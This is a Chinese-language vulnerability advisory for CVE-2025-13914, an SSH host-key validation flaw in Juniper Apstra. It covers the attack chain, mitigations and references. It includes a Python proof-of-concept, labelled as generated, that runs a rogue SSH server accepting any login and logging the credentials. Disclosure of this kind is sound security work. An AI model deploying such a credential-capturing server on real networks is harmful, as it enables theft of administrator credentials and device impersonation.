CVE-2025-13914 Juniper Apstra SSH中间人攻击漏洞

漏洞信息

漏洞编号

CVE-2025-13914

漏洞类型

中间人攻击

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Apstra

漏洞概述

Juniper Networks Apstra在SSH实现中存在无实体认证的密钥交换漏洞。由于对受管设备的SSH主机密钥验证不足，未经身份验证的攻击者可在网络中执行中间人攻击（MITM）。攻击者可拦截Apstra到受管设备的连接，提供伪造的SSH密钥，从而冒充受管设备并捕获用户凭证。该漏洞影响6.1.1之前的所有版本，CVSS评分为8.7，属于高危漏洞。

技术细节

该漏洞的核心在于SSH客户端（Apstra）在密钥交换阶段未严格验证服务器的身份。在正常的SSH连接中，客户端应校验服务器的主机密钥以防止MITM。然而，Apstra存在验证缺失，使得攻击者能够利用ARP欺骗或DNS投毒等方式介入网络。当Apstra尝试连接受管设备时，攻击者拦截连接并向Apstra发送自生成的SSH公钥。由于Apstra未正确校验，它接受了攻击者的密钥并建立了加密通道。此时，攻击者成功冒充了受管设备。随后，Apstra可能会发送管理凭证或配置信息给攻击者，导致凭证泄露和潜在的设备劫持。攻击无需用户交互，且一旦网络位置被攻陷，利用难度较低。

攻击链分析

STEP 1

侦察与定位

攻击者识别出Juniper Networks Apstra服务器及其管理的网络设备，并确定其网络路径。

STEP 2

网络拦截

攻击者利用ARP欺骗、DNS投毒或其他网络层攻击技术，将自己置于Apstra服务器与受管设备之间的流量路径上。

STEP 3

建立MITM连接

当Apstra尝试向受管设备发起SSH连接时，攻击者拦截该请求，并利用漏洞（缺乏主机密钥验证）向Apstra提供伪造的SSH公钥。

STEP 4

凭证窃取

Apstra接受伪造密钥并完成握手。攻击者作为中间人接收Apstra发送的管理凭证（用户名/密码）或配置命令。

STEP 5

设备冒充

攻击者利用获取的凭证或现有的加密通道，冒充合法设备向Apstra发送恶意指令或维持持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import paramiko
import socket
import threading

# Generated PoC for CVE-2025-13914
# This script simulates a malicious SSH server to intercept credentials
# due to lack of host key validation on the client (Apstra).

class SSHMitMServer(paramiko.ServerInterface):
    def check_auth_password(self, username, password):
        # Log the captured credentials
        print(f"[+] Captured Credentials -> Username: {username}, Password: {password}")
        # Return success to keep the connection open for further interaction
        return paramiko.AUTH_SUCCESSFUL

    def get_allowed_auths(self, username):
        return 'password'

    def check_channel_request(self, kind, chanid):
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

def start_mitm_server(host_key):
    server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_sock.bind(('0.0.0.0', 22))
    server_sock.listen(100)
    print("[*] Malicious SSH Server listening on port 22...")

    try:
        while True:
            client_sock, addr = server_sock.accept()
            print(f"[+] Connection intercepted from: {addr[0]}")
            transport = paramiko.Transport(client_sock)
            transport.add_server_key(host_key)
            try:
                server = SSHMitMServer()
                transport.start_server(server=server)
            except Exception as e:
                print(f"[-] Error starting server: {e}")
                transport.close()
    except KeyboardInterrupt:
        server_sock.close()

if __name__ == "__main__":
    # Generate a new RSA key for the attacker
    print("[*] Generating malicious host key...")
    key = paramiko.RSAKey.generate(2048)
    start_mitm_server(key)

影响范围

Juniper Networks Apstra < 6.1.1

防御指南

临时缓解措施

如果无法立即升级，建议在网络层实施严格的隔离，确保Apstra服务器与受管设备之间的通信处于受信任的VLAN或通过加密隧道（如IPSec）传输，以防止二层网络中的ARP欺骗等中间人攻击。同时，应监控异常的SSH连接尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13914
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13914
3 Details https://www.cvedetails.com/cve/CVE-2025-13914/
4 VulDB https://vuldb.com/cve/CVE-2025-13914
5 Link https://kb.juniper.net/JSA107862